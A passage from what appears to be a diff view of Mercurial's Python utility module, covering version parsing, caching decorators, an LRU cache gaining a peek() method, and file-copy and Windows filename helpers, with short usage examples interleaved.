953 953 def setsockopt(self, res, level, optname, value):
954 954 if not self.states:
955 955 return
956 956
957 957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 958 self.name, level, optname, value, res))
959 959
960 960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 961 logdata=False, logdataapis=True):
962 962 """Turn a socket into a logging socket."""
963 963
964 964 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 965 states=states, logdata=logdata,
966 966 logdataapis=logdataapis)
967 967 return socketproxy(fh, observer)
968 968
969 969 def version():
970 970 """Return version information if available."""
971 971 try:
972 972 from . import __version__
973 973 return __version__.version
974 974 except ImportError:
975 975 return 'unknown'
976 976
977 977 def versiontuple(v=None, n=4):
978 978 """Parses a Mercurial version string into an N-tuple.
979 979
980 980 The version string to be parsed is specified with the ``v`` argument.
981 981 If it isn't defined, the current Mercurial version string will be parsed.
982 982
983 983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 984 returned values:
985 985
986 986 >>> v = b'3.6.1+190-df9b73d2d444'
987 987 >>> versiontuple(v, 2)
988 988 (3, 6)
989 989 >>> versiontuple(v, 3)
990 990 (3, 6, 1)
991 991 >>> versiontuple(v, 4)
992 992 (3, 6, 1, '190-df9b73d2d444')
993 993
994 994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 995 (3, 6, 1, '190-df9b73d2d444+20151118')
996 996
997 997 >>> v = b'3.6'
998 998 >>> versiontuple(v, 2)
999 999 (3, 6)
1000 1000 >>> versiontuple(v, 3)
1001 1001 (3, 6, None)
1002 1002 >>> versiontuple(v, 4)
1003 1003 (3, 6, None, None)
1004 1004
1005 1005 >>> v = b'3.9-rc'
1006 1006 >>> versiontuple(v, 2)
1007 1007 (3, 9)
1008 1008 >>> versiontuple(v, 3)
1009 1009 (3, 9, None)
1010 1010 >>> versiontuple(v, 4)
1011 1011 (3, 9, None, 'rc')
1012 1012
1013 1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 1014 >>> versiontuple(v, 2)
1015 1015 (3, 9)
1016 1016 >>> versiontuple(v, 3)
1017 1017 (3, 9, None)
1018 1018 >>> versiontuple(v, 4)
1019 1019 (3, 9, None, 'rc+2-02a8fea4289b')
1020 1020
1021 1021 >>> versiontuple(b'4.6rc0')
1022 1022 (4, 6, None, 'rc0')
1023 1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 1024 (4, 6, None, 'rc0+12-425d55e54f98')
1025 1025 >>> versiontuple(b'.1.2.3')
1026 1026 (None, None, None, '.1.2.3')
1027 1027 >>> versiontuple(b'12.34..5')
1028 1028 (12, 34, None, '..5')
1029 1029 >>> versiontuple(b'1.2.3.4.5.6')
1030 1030 (1, 2, 3, '.4.5.6')
1031 1031 """
1032 1032 if not v:
1033 1033 v = version()
1034 1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 1035 if not m:
1036 1036 vparts, extra = '', v
1037 1037 elif m.group(2):
1038 1038 vparts, extra = m.groups()
1039 1039 else:
1040 1040 vparts, extra = m.group(1), None
1041 1041
1042 1042 vints = []
1043 1043 for i in vparts.split('.'):
1044 1044 try:
1045 1045 vints.append(int(i))
1046 1046 except ValueError:
1047 1047 break
1048 1048 # (3, 6) -> (3, 6, None)
1049 1049 while len(vints) < 3:
1050 1050 vints.append(None)
1051 1051
1052 1052 if n == 2:
1053 1053 return (vints[0], vints[1])
1054 1054 if n == 3:
1055 1055 return (vints[0], vints[1], vints[2])
1056 1056 if n == 4:
1057 1057 return (vints[0], vints[1], vints[2], extra)
1058 1058
1059 1059 def cachefunc(func):
1060 1060 '''cache the result of function calls'''
1061 1061 # XXX doesn't handle keyword args
1062 1062 if func.__code__.co_argcount == 0:
1063 1063 cache = []
1064 1064 def f():
1065 1065 if len(cache) == 0:
1066 1066 cache.append(func())
1067 1067 return cache[0]
1068 1068 return f
1069 1069 cache = {}
1070 1070 if func.__code__.co_argcount == 1:
1071 1071 # we gain a small amount of time because
1072 1072 # we don't need to pack/unpack the list
1073 1073 def f(arg):
1074 1074 if arg not in cache:
1075 1075 cache[arg] = func(arg)
1076 1076 return cache[arg]
1077 1077 else:
1078 1078 def f(*args):
1079 1079 if args not in cache:
1080 1080 cache[args] = func(*args)
1081 1081 return cache[args]
1082 1082
1083 1083 return f
1084 1084
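For instance, memoizing a single-argument function: the recursive calls go through the cached wrapper, so each distinct value is computed only once.

@cachefunc
def fib(n):
    return n if n < 2 else fib(n - 1) + fib(n - 2)

fib(30)  # fast: every distinct argument is evaluated exactly once
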
1085 1085 class cow(object):
1086 1086 """helper class to make copy-on-write easier
1087 1087
1088 1088 Call preparewrite before doing any writes.
1089 1089 """
1090 1090
1091 1091 def preparewrite(self):
1092 1092 """call this before writes, return self or a copied new object"""
1093 1093 if getattr(self, '_copied', 0):
1094 1094 self._copied -= 1
1095 1095 return self.__class__(self)
1096 1096 return self
1097 1097
1098 1098 def copy(self):
1099 1099 """always do a cheap copy"""
1100 1100 self._copied = getattr(self, '_copied', 0) + 1
1101 1101 return self
1102 1102
1103 1103 class sortdict(collections.OrderedDict):
1104 1104 '''a simple sorted dictionary
1105 1105
1106 1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 1107 >>> d2 = d1.copy()
1108 1108 >>> d2
1109 1109 sortdict([('a', 0), ('b', 1)])
1110 1110 >>> d2.update([(b'a', 2)])
1111 1111 >>> list(d2.keys()) # should still be in last-set order
1112 1112 ['b', 'a']
1113 1113 '''
1114 1114
1115 1115 def __setitem__(self, key, value):
1116 1116 if key in self:
1117 1117 del self[key]
1118 1118 super(sortdict, self).__setitem__(key, value)
1119 1119
1120 1120 if pycompat.ispypy:
1121 1121 # __setitem__() isn't called as of PyPy 5.8.0
1122 1122 def update(self, src):
1123 1123 if isinstance(src, dict):
1124 1124 src = src.iteritems()
1125 1125 for k, v in src:
1126 1126 self[k] = v
1127 1127
1128 1128 class cowdict(cow, dict):
1129 1129 """copy-on-write dict
1130 1130
1131 1131 Be sure to call d = d.preparewrite() before writing to d.
1132 1132
1133 1133 >>> a = cowdict()
1134 1134 >>> a is a.preparewrite()
1135 1135 True
1136 1136 >>> b = a.copy()
1137 1137 >>> b is a
1138 1138 True
1139 1139 >>> c = b.copy()
1140 1140 >>> c is a
1141 1141 True
1142 1142 >>> a = a.preparewrite()
1143 1143 >>> b is a
1144 1144 False
1145 1145 >>> a is a.preparewrite()
1146 1146 True
1147 1147 >>> c = c.preparewrite()
1148 1148 >>> b is c
1149 1149 False
1150 1150 >>> b is b.preparewrite()
1151 1151 True
1152 1152 """
1153 1153
1154 1154 class cowsortdict(cow, sortdict):
1155 1155 """copy-on-write sortdict
1156 1156
1157 1157 Be sure to call d = d.preparewrite() before writing to d.
1158 1158 """
1159 1159
1160 1160 class transactional(object):
1161 1161 """Base class for making a transactional type into a context manager."""
1162 1162 __metaclass__ = abc.ABCMeta
1163 1163
1164 1164 @abc.abstractmethod
1165 1165 def close(self):
1166 1166 """Successfully closes the transaction."""
1167 1167
1168 1168 @abc.abstractmethod
1169 1169 def release(self):
1170 1170 """Marks the end of the transaction.
1171 1171
1172 1172 If the transaction has not been closed, it will be aborted.
1173 1173 """
1174 1174
1175 1175 def __enter__(self):
1176 1176 return self
1177 1177
1178 1178 def __exit__(self, exc_type, exc_val, exc_tb):
1179 1179 try:
1180 1180 if exc_type is None:
1181 1181 self.close()
1182 1182 finally:
1183 1183 self.release()
1184 1184
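A minimal concrete subclass as a sketch of the contract: __exit__ calls close() only on success, and release() always runs, aborting anything left open.

class demotransaction(transactional):
    def __init__(self):
        self.state = 'open'
    def close(self):
        self.state = 'committed'
    def release(self):
        if self.state != 'committed':
            self.state = 'aborted'

with demotransaction() as tr:
    pass
assert tr.state == 'committed'  # an exception inside would leave 'aborted'
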
1185 1185 @contextlib.contextmanager
1186 1186 def acceptintervention(tr=None):
1187 1187 """A context manager that closes the transaction on InterventionRequired
1188 1188
1189 1189 If no transaction was provided, this simply runs the body and returns
1190 1190 """
1191 1191 if not tr:
1192 1192 yield
1193 1193 return
1194 1194 try:
1195 1195 yield
1196 1196 tr.close()
1197 1197 except error.InterventionRequired:
1198 1198 tr.close()
1199 1199 raise
1200 1200 finally:
1201 1201 tr.release()
1202 1202
1203 1203 @contextlib.contextmanager
1204 1204 def nullcontextmanager():
1205 1205 yield
1206 1206
1207 1207 class _lrucachenode(object):
1208 1208 """A node in a doubly linked list.
1209 1209
1210 1210 Holds a reference to nodes on either side as well as a key-value
1211 1211 pair for the dictionary entry.
1212 1212 """
1213 1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214 1214
1215 1215 def __init__(self):
1216 1216 self.next = None
1217 1217 self.prev = None
1218 1218
1219 1219 self.key = _notset
1220 1220 self.value = None
1221 1221 self.cost = 0
1222 1222
1223 1223 def markempty(self):
1224 1224 """Mark the node as emptied."""
1225 1225 self.key = _notset
1226 1226 self.value = None
1227 1227 self.cost = 0
1228 1228
1229 1229 class lrucachedict(object):
1230 1230 """Dict that caches most recent accesses and sets.
1231 1231
1232 1232 The dict consists of an actual backing dict - indexed by original
1233 1233 key - and a doubly linked circular list defining the order of entries in
1234 1234 the cache.
1235 1235
1236 1236 The head node is the newest entry in the cache. If the cache is full,
1237 1237 we recycle head.prev and make it the new head. Cache accesses result in
1238 1238 the node being moved to before the existing head and being marked as the
1239 1239 new head node.
1240 1240
1241 1241 Items in the cache can be inserted with an optional "cost" value. This is
1242 1242 simply an integer that is specified by the caller. The cache can be queried
1243 1243 for the total cost of all items presently in the cache.
1244 1244
1245 1245 The cache can also define a maximum cost. If a cache insertion would
1246 1246 cause the total cost of the cache to go beyond the maximum cost limit,
1247 1247 nodes will be evicted to make room for the new node. This can be used
1248 1248 to e.g. set a max memory limit and associate an estimated bytes size
1249 1249 cost to each item in the cache. By default, no maximum cost is enforced.
1250 1250 """
1251 1251 def __init__(self, max, maxcost=0):
1252 1252 self._cache = {}
1253 1253
1254 1254 self._head = head = _lrucachenode()
1255 1255 head.prev = head
1256 1256 head.next = head
1257 1257 self._size = 1
1258 1258 self.capacity = max
1259 1259 self.totalcost = 0
1260 1260 self.maxcost = maxcost
1261 1261
1262 1262 def __len__(self):
1263 1263 return len(self._cache)
1264 1264
1265 1265 def __contains__(self, k):
1266 1266 return k in self._cache
1267 1267
1268 1268 def __iter__(self):
1269 1269 # We don't have to iterate in cache order, but why not.
1270 1270 n = self._head
1271 1271 for i in range(len(self._cache)):
1272 1272 yield n.key
1273 1273 n = n.next
1274 1274
1275 1275 def __getitem__(self, k):
1276 1276 node = self._cache[k]
1277 1277 self._movetohead(node)
1278 1278 return node.value
1279 1279
1280 1280 def insert(self, k, v, cost=0):
1281 1281 """Insert a new item in the cache with optional cost value."""
1282 1282 node = self._cache.get(k)
1283 1283 # Replace existing value and mark as newest.
1284 1284 if node is not None:
1285 1285 self.totalcost -= node.cost
1286 1286 node.value = v
1287 1287 node.cost = cost
1288 1288 self.totalcost += cost
1289 1289 self._movetohead(node)
1290 1290
1291 1291 if self.maxcost:
1292 1292 self._enforcecostlimit()
1293 1293
1294 1294 return
1295 1295
1296 1296 if self._size < self.capacity:
1297 1297 node = self._addcapacity()
1298 1298 else:
1299 1299 # Grab the last/oldest item.
1300 1300 node = self._head.prev
1301 1301
1302 1302 # At capacity. Kill the old entry.
1303 1303 if node.key is not _notset:
1304 1304 self.totalcost -= node.cost
1305 1305 del self._cache[node.key]
1306 1306
1307 1307 node.key = k
1308 1308 node.value = v
1309 1309 node.cost = cost
1310 1310 self.totalcost += cost
1311 1311 self._cache[k] = node
1312 1312 # And mark it as newest entry. No need to adjust order since it
1313 1313 # is already self._head.prev.
1314 1314 self._head = node
1315 1315
1316 1316 if self.maxcost:
1317 1317 self._enforcecostlimit()
1318 1318
1319 1319 def __setitem__(self, k, v):
1320 1320 self.insert(k, v)
1321 1321
1322 1322 def __delitem__(self, k):
1323 1323 node = self._cache.pop(k)
1324 1324 self.totalcost -= node.cost
1325 1325 node.markempty()
1326 1326
1327 1327 # Temporarily mark as newest item before re-adjusting head to make
1328 1328 # this node the oldest item.
1329 1329 self._movetohead(node)
1330 1330 self._head = node.next
1331 1331
1332 1332 # Additional dict methods.
1333 1333
1334 1334 def get(self, k, default=None):
1335 1335 try:
1336 1336 return self.__getitem__(k)
1337 1337 except KeyError:
1338 1338 return default
1339 1339
1340 def peek(self, k, default=_notset):
1341 """Get the specified item without moving it to the head
1342
1343 Unlike get(), this doesn't mutate the internal state. But be aware
1344 that this doesn't mean peek() is thread safe.
1345 """
1346 try:
1347 node = self._cache[k]
1348 return node.value
1349 except KeyError:
1350 if default is _notset:
1351 raise
1352 return default
1353
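A sketch contrasting peek() with get(): because peek() leaves the recency order alone, it does not protect an entry from eviction.

d = lrucachedict(2)
d['a'] = 'va'
d['b'] = 'vb'
d.peek('a')            # returns 'va' without refreshing 'a'
d['c'] = 'vc'          # so 'a', still the oldest entry, is evicted
assert 'a' not in d    # d['a'] instead of peek() would have saved it
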
1340 1354 def clear(self):
1341 1355 n = self._head
1342 1356 while n.key is not _notset:
1343 1357 self.totalcost -= n.cost
1344 1358 n.markempty()
1345 1359 n = n.next
1346 1360
1347 1361 self._cache.clear()
1348 1362
1349 1363 def copy(self, capacity=None, maxcost=0):
1350 1364 """Create a new cache as a copy of the current one.
1351 1365
1352 1366 By default, the new cache has the same capacity as the existing one.
1353 1367 But, the cache capacity can be changed as part of performing the
1354 1368 copy.
1355 1369
1356 1370 Items in the copy have an insertion/access order matching this
1357 1371 instance.
1358 1372 """
1359 1373
1360 1374 capacity = capacity or self.capacity
1361 1375 maxcost = maxcost or self.maxcost
1362 1376 result = lrucachedict(capacity, maxcost=maxcost)
1363 1377
1364 1378 # We copy entries by iterating in oldest-to-newest order so the copy
1365 1379 # has the correct ordering.
1366 1380
1367 1381 # Find the first non-empty entry.
1368 1382 n = self._head.prev
1369 1383 while n.key is _notset and n is not self._head:
1370 1384 n = n.prev
1371 1385
1372 1386 # We could potentially skip the first N items when decreasing capacity.
1373 1387 # But let's keep it simple unless it is a performance problem.
1374 1388 for i in range(len(self._cache)):
1375 1389 result.insert(n.key, n.value, cost=n.cost)
1376 1390 n = n.prev
1377 1391
1378 1392 return result
1379 1393
1380 1394 def popoldest(self):
1381 1395 """Remove the oldest item from the cache.
1382 1396
1383 1397 Returns the (key, value) describing the removed cache entry.
1384 1398 """
1385 1399 if not self._cache:
1386 1400 return
1387 1401
1388 1402 # Walk the linked list backwards starting at tail node until we hit
1389 1403 # a non-empty node.
1390 1404 n = self._head.prev
1391 1405 while n.key is _notset:
1392 1406 n = n.prev
1393 1407
1394 1408 key, value = n.key, n.value
1395 1409
1396 1410 # And remove it from the cache and mark it as empty.
1397 1411 del self._cache[n.key]
1398 1412 self.totalcost -= n.cost
1399 1413 n.markempty()
1400 1414
1401 1415 return key, value
1402 1416
1403 1417 def _movetohead(self, node):
1404 1418 """Mark a node as the newest, making it the new head.
1405 1419
1406 1420 When a node is accessed, it becomes the freshest entry in the LRU
1407 1421 list, which is denoted by self._head.
1408 1422
1409 1423 Visually, let's make ``N`` the new head node (* denotes head):
1410 1424
1411 1425 previous/oldest <-> head <-> next/next newest
1412 1426
1413 1427 ----<->--- A* ---<->-----
1414 1428 | |
1415 1429 E <-> D <-> N <-> C <-> B
1416 1430
1417 1431 To:
1418 1432
1419 1433 ----<->--- N* ---<->-----
1420 1434 | |
1421 1435 E <-> D <-> C <-> B <-> A
1422 1436
1423 1437 This requires the following moves:
1424 1438
1425 1439 C.next = D (node.prev.next = node.next)
1426 1440 D.prev = C (node.next.prev = node.prev)
1427 1441 E.next = N (head.prev.next = node)
1428 1442 N.prev = E (node.prev = head.prev)
1429 1443 N.next = A (node.next = head)
1430 1444 A.prev = N (head.prev = node)
1431 1445 """
1432 1446 head = self._head
1433 1447 # C.next = D
1434 1448 node.prev.next = node.next
1435 1449 # D.prev = C
1436 1450 node.next.prev = node.prev
1437 1451 # N.prev = E
1438 1452 node.prev = head.prev
1439 1453 # N.next = A
1440 1454 # It is tempting to do just "head" here, however if node is
1441 1455 # adjacent to head, this will do bad things.
1442 1456 node.next = head.prev.next
1443 1457 # E.next = N
1444 1458 node.next.prev = node
1445 1459 # A.prev = N
1446 1460 node.prev.next = node
1447 1461
1448 1462 self._head = node
1449 1463
1450 1464 def _addcapacity(self):
1451 1465 """Add a node to the circular linked list.
1452 1466
1453 1467 The new node is inserted before the head node.
1454 1468 """
1455 1469 head = self._head
1456 1470 node = _lrucachenode()
1457 1471 head.prev.next = node
1458 1472 node.prev = head.prev
1459 1473 node.next = head
1460 1474 head.prev = node
1461 1475 self._size += 1
1462 1476 return node
1463 1477
1464 1478 def _enforcecostlimit(self):
1465 1479 # This should run after an insertion. It should only be called if total
1466 1480 # cost limits are being enforced.
1467 1481 # The most recently inserted node is never evicted.
1468 1482 if len(self) <= 1 or self.totalcost <= self.maxcost:
1469 1483 return
1470 1484
1471 1485 # This is logically equivalent to calling popoldest() until we
1472 1486 # free up enough cost. We don't do that since popoldest() needs
1473 1487 # to walk the linked list and doing this in a loop would be
1474 1488 # quadratic. So we find the first non-empty node and then
1475 1489 # walk nodes until we free up enough capacity.
1476 1490 #
1477 1491 # If we only removed the minimum number of nodes to free enough
1478 1492 # cost at insert time, chances are high that the next insert would
1479 1493 # also require pruning. This would effectively constitute quadratic
1480 1494 # behavior for insert-heavy workloads. To mitigate this, we set a
1481 1495 # target cost that is a percentage of the max cost. This will tend
1482 1496 # to free more nodes when the high water mark is reached, which
1483 1497 # lowers the chances of needing to prune on the subsequent insert.
1484 1498 targetcost = int(self.maxcost * 0.75)
1485 1499
1486 1500 n = self._head.prev
1487 1501 while n.key is _notset:
1488 1502 n = n.prev
1489 1503
1490 1504 while len(self) > 1 and self.totalcost > targetcost:
1491 1505 del self._cache[n.key]
1492 1506 self.totalcost -= n.cost
1493 1507 n.markempty()
1494 1508 n = n.prev
1495 1509
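And a sketch of the cost limit in action: once an insertion pushes totalcost past maxcost, eviction trims the cache down toward the 75% target described in _enforcecostlimit().

d = lrucachedict(10, maxcost=100)
d.insert('x', 'vx', cost=60)
d.insert('y', 'vy', cost=60)  # totalcost hits 120, above maxcost
assert 'x' not in d           # the oldest entry was evicted
assert d.totalcost == 60
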
1496 1510 def lrucachefunc(func):
1497 1511 '''cache most recent results of function calls'''
1498 1512 cache = {}
1499 1513 order = collections.deque()
1500 1514 if func.__code__.co_argcount == 1:
1501 1515 def f(arg):
1502 1516 if arg not in cache:
1503 1517 if len(cache) > 20:
1504 1518 del cache[order.popleft()]
1505 1519 cache[arg] = func(arg)
1506 1520 else:
1507 1521 order.remove(arg)
1508 1522 order.append(arg)
1509 1523 return cache[arg]
1510 1524 else:
1511 1525 def f(*args):
1512 1526 if args not in cache:
1513 1527 if len(cache) > 20:
1514 1528 del cache[order.popleft()]
1515 1529 cache[args] = func(*args)
1516 1530 else:
1517 1531 order.remove(args)
1518 1532 order.append(args)
1519 1533 return cache[args]
1520 1534
1521 1535 return f
1522 1536
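Usage mirrors cachefunc, except only roughly the 20 most recently used results are retained; the print below makes cache misses visible.

@lrucachefunc
def revparse(spec):
    print('parsing %s' % spec)  # side effect marks a cache miss
    return spec.upper()

revparse('tip')  # prints, computes
revparse('tip')  # served from the LRU cache, no print
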
1523 1537 class propertycache(object):
1524 1538 def __init__(self, func):
1525 1539 self.func = func
1526 1540 self.name = func.__name__
1527 1541 def __get__(self, obj, type=None):
1528 1542 result = self.func(obj)
1529 1543 self.cachevalue(obj, result)
1530 1544 return result
1531 1545
1532 1546 def cachevalue(self, obj, value):
1533 1547 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1534 1548 obj.__dict__[self.name] = value
1535 1549
1536 1550 def clearcachedproperty(obj, prop):
1537 1551 '''clear a cached property value, if one has been set'''
1538 1552 prop = pycompat.sysstr(prop)
1539 1553 if prop in obj.__dict__:
1540 1554 del obj.__dict__[prop]
1541 1555
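A sketch of the pattern: the first attribute access runs the function, cachevalue() then shadows the descriptor via __dict__, and clearcachedproperty() undoes that.

class repoinfo(object):
    @propertycache
    def branchmap(self):
        print('computing')       # runs only on the first access
        return {'default': []}

info = repoinfo()
info.branchmap                           # prints, then caches in __dict__
info.branchmap                           # plain attribute lookup now
clearcachedproperty(info, b'branchmap')  # next access recomputes
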
1542 1556 def increasingchunks(source, min=1024, max=65536):
1543 1557 '''return no less than min bytes per chunk while data remains,
1544 1558 doubling min after each chunk until it reaches max'''
1545 1559 def log2(x):
1546 1560 if not x:
1547 1561 return 0
1548 1562 i = 0
1549 1563 while x:
1550 1564 x >>= 1
1551 1565 i += 1
1552 1566 return i - 1
1553 1567
1554 1568 buf = []
1555 1569 blen = 0
1556 1570 for chunk in source:
1557 1571 buf.append(chunk)
1558 1572 blen += len(chunk)
1559 1573 if blen >= min:
1560 1574 if min < max:
1561 1575 min = min << 1
1562 1576 nmin = 1 << log2(blen)
1563 1577 if nmin > min:
1564 1578 min = nmin
1565 1579 if min > max:
1566 1580 min = max
1567 1581 yield ''.join(buf)
1568 1582 blen = 0
1569 1583 buf = []
1570 1584 if buf:
1571 1585 yield ''.join(buf)
1572 1586
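For example, ten 500-byte pieces get coalesced into progressively larger chunks, amortizing per-chunk overhead for downstream consumers:

source = iter(['x' * 500] * 10)
for chunk in increasingchunks(source, min=1024, max=4096):
    print(len(chunk))  # prints 1500, then 2500, then 1000
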
1573 1587 def always(fn):
1574 1588 return True
1575 1589
1576 1590 def never(fn):
1577 1591 return False
1578 1592
1579 1593 def nogc(func):
1580 1594 """disable garbage collector
1581 1595
1582 1596 Python's garbage collector triggers a GC each time a certain number of
1583 1597 container objects (the number being defined by gc.get_threshold()) are
1584 1598 allocated even when marked not to be tracked by the collector. Tracking has
1585 1599 no effect on when GCs are triggered, only on what objects the GC looks
1586 1600 into. As a workaround, disable GC while building complex (huge)
1587 1601 containers.
1588 1602
1589 1603 This garbage collector issue has been fixed in 2.7, but it still affects
1590 1604 CPython's performance.
1591 1605 """
1592 1606 def wrapper(*args, **kwargs):
1593 1607 gcenabled = gc.isenabled()
1594 1608 gc.disable()
1595 1609 try:
1596 1610 return func(*args, **kwargs)
1597 1611 finally:
1598 1612 if gcenabled:
1599 1613 gc.enable()
1600 1614 return wrapper
1601 1615
1602 1616 if pycompat.ispypy:
1603 1617 # PyPy runs slower with gc disabled
1604 1618 nogc = lambda x: x
1605 1619
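As a usage sketch, decorate a builder of large container structures so the collector cannot fire mid-construction:

@nogc
def buildhugemapping(items):
    # GC stays disabled while this allocates many containers
    return dict((k, [k]) for k in items)

mapping = buildhugemapping(range(100000))
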
1606 1620 def pathto(root, n1, n2):
1607 1621 '''return the relative path from one place to another.
1608 1622 root should use os.sep to separate directories
1609 1623 n1 should use os.sep to separate directories
1610 1624 n2 should use "/" to separate directories
1611 1625 returns an os.sep-separated path.
1612 1626
1613 1627 If n1 is a relative path, it's assumed it's
1614 1628 relative to root.
1615 1629 n2 should always be relative to root.
1616 1630 '''
1617 1631 if not n1:
1618 1632 return localpath(n2)
1619 1633 if os.path.isabs(n1):
1620 1634 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1621 1635 return os.path.join(root, localpath(n2))
1622 1636 n2 = '/'.join((pconvert(root), n2))
1623 1637 a, b = splitpath(n1), n2.split('/')
1624 1638 a.reverse()
1625 1639 b.reverse()
1626 1640 while a and b and a[-1] == b[-1]:
1627 1641 a.pop()
1628 1642 b.pop()
1629 1643 b.reverse()
1630 1644 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1631 1645
1632 1646 # the location of data files matching the source code
1633 1647 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1634 1648 # executable version (py2exe) doesn't support __file__
1635 1649 datapath = os.path.dirname(pycompat.sysexecutable)
1636 1650 else:
1637 1651 datapath = os.path.dirname(pycompat.fsencode(__file__))
1638 1652
1639 1653 i18n.setdatapath(datapath)
1640 1654
1641 1655 def checksignature(func):
1642 1656 '''wrap a function with code to check for calling errors'''
1643 1657 def check(*args, **kwargs):
1644 1658 try:
1645 1659 return func(*args, **kwargs)
1646 1660 except TypeError:
1647 1661 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1648 1662 raise error.SignatureError
1649 1663 raise
1650 1664
1651 1665 return check
1652 1666
1653 1667 # a whitelist of known filesystems where hardlinks work reliably
1654 1668 _hardlinkfswhitelist = {
1655 1669 'apfs',
1656 1670 'btrfs',
1657 1671 'ext2',
1658 1672 'ext3',
1659 1673 'ext4',
1660 1674 'hfs',
1661 1675 'jfs',
1662 1676 'NTFS',
1663 1677 'reiserfs',
1664 1678 'tmpfs',
1665 1679 'ufs',
1666 1680 'xfs',
1667 1681 'zfs',
1668 1682 }
1669 1683
1670 1684 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1671 1685 '''copy a file, preserving mode and optionally other stat info like
1672 1686 atime/mtime
1673 1687
1674 1688 checkambig argument is used with filestat, and is useful only if
1675 1689 destination file is guarded by any lock (e.g. repo.lock or
1676 1690 repo.wlock).
1677 1691
1678 1692 copystat and checkambig should be exclusive.
1679 1693 '''
1680 1694 assert not (copystat and checkambig)
1681 1695 oldstat = None
1682 1696 if os.path.lexists(dest):
1683 1697 if checkambig:
1684 1698 oldstat = checkambig and filestat.frompath(dest)
1685 1699 unlink(dest)
1686 1700 if hardlink:
1687 1701 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1688 1702 # unless we are confident that dest is on a whitelisted filesystem.
1689 1703 try:
1690 1704 fstype = getfstype(os.path.dirname(dest))
1691 1705 except OSError:
1692 1706 fstype = None
1693 1707 if fstype not in _hardlinkfswhitelist:
1694 1708 hardlink = False
1695 1709 if hardlink:
1696 1710 try:
1697 1711 oslink(src, dest)
1698 1712 return
1699 1713 except (IOError, OSError):
1700 1714 pass # fall back to normal copy
1701 1715 if os.path.islink(src):
1702 1716 os.symlink(os.readlink(src), dest)
1703 1717 # copytime is ignored for symlinks, but in general copytime isn't needed
1704 1718 # for them anyway
1705 1719 else:
1706 1720 try:
1707 1721 shutil.copyfile(src, dest)
1708 1722 if copystat:
1709 1723 # copystat also copies mode
1710 1724 shutil.copystat(src, dest)
1711 1725 else:
1712 1726 shutil.copymode(src, dest)
1713 1727 if oldstat and oldstat.stat:
1714 1728 newstat = filestat.frompath(dest)
1715 1729 if newstat.isambig(oldstat):
1716 1730 # stat of copied file is ambiguous to original one
1717 1731 advanced = (
1718 1732 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1719 1733 os.utime(dest, (advanced, advanced))
1720 1734 except shutil.Error as inst:
1721 1735 raise error.Abort(str(inst))
1722 1736
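# Illustrative sketch (not part of the module): a caller asking for a
# hardlink gets one only when the destination filesystem is whitelisted
# and oslink() succeeds; otherwise copyfile() silently falls back to a
# real copy that preserves the permission bits:
#
#   copyfile(b'src.txt', b'dst.txt', hardlink=True)
#   # dst.txt is now either a hardlink to src.txt or an independent
#   # copy; pass copystat=True to also carry over atime/mtime
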
1723 1737 def copyfiles(src, dst, hardlink=None, progress=None):
1724 1738 """Copy a directory tree using hardlinks if possible."""
1725 1739 num = 0
1726 1740
1727 1741 def settopic():
1728 1742 if progress:
1729 1743 progress.topic = _('linking') if hardlink else _('copying')
1730 1744
1731 1745 if os.path.isdir(src):
1732 1746 if hardlink is None:
1733 1747 hardlink = (os.stat(src).st_dev ==
1734 1748 os.stat(os.path.dirname(dst)).st_dev)
1735 1749 settopic()
1736 1750 os.mkdir(dst)
1737 1751 for name, kind in listdir(src):
1738 1752 srcname = os.path.join(src, name)
1739 1753 dstname = os.path.join(dst, name)
1740 1754 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1741 1755 num += n
1742 1756 else:
1743 1757 if hardlink is None:
1744 1758 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1745 1759 os.stat(os.path.dirname(dst)).st_dev)
1746 1760 settopic()
1747 1761
1748 1762 if hardlink:
1749 1763 try:
1750 1764 oslink(src, dst)
1751 1765 except (IOError, OSError):
1752 1766 hardlink = False
1753 1767 shutil.copy(src, dst)
1754 1768 else:
1755 1769 shutil.copy(src, dst)
1756 1770 num += 1
1757 1771 if progress:
1758 1772 progress.increment()
1759 1773
1760 1774 return hardlink, num
1761 1775
1762 1776 _winreservednames = {
1763 1777 'con', 'prn', 'aux', 'nul',
1764 1778 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1765 1779 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1766 1780 }
1767 1781 _winreservedchars = ':*?"<>|'
1768 1782 def checkwinfilename(path):
1769 1783 r'''Check that the base-relative path is a valid filename on Windows.
1770 1784 Returns None if the path is ok, or a UI string describing the problem.
1771 1785
1772 1786 >>> checkwinfilename(b"just/a/normal/path")
1773 1787 >>> checkwinfilename(b"foo/bar/con.xml")
1774 1788 "filename contains 'con', which is reserved on Windows"
1775 1789 >>> checkwinfilename(b"foo/con.xml/bar")
1776 1790 "filename contains 'con', which is reserved on Windows"
1777 1791 >>> checkwinfilename(b"foo/bar/xml.con")
1778 1792 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1779 1793 "filename contains 'AUX', which is reserved on Windows"
1780 1794 >>> checkwinfilename(b"foo/bar/bla:.txt")
1781 1795 "filename contains ':', which is reserved on Windows"
1782 1796 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1783 1797 "filename contains '\\x07', which is invalid on Windows"
1784 1798 >>> checkwinfilename(b"foo/bar/bla ")
1785 1799 "filename ends with ' ', which is not allowed on Windows"
1786 1800 >>> checkwinfilename(b"../bar")
